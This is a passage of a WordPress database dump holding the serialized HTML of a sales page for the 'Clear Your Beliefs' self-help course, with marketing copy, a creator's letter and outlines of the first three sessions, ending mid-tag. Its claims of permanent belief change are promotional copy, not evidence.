(3815, 3149, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" 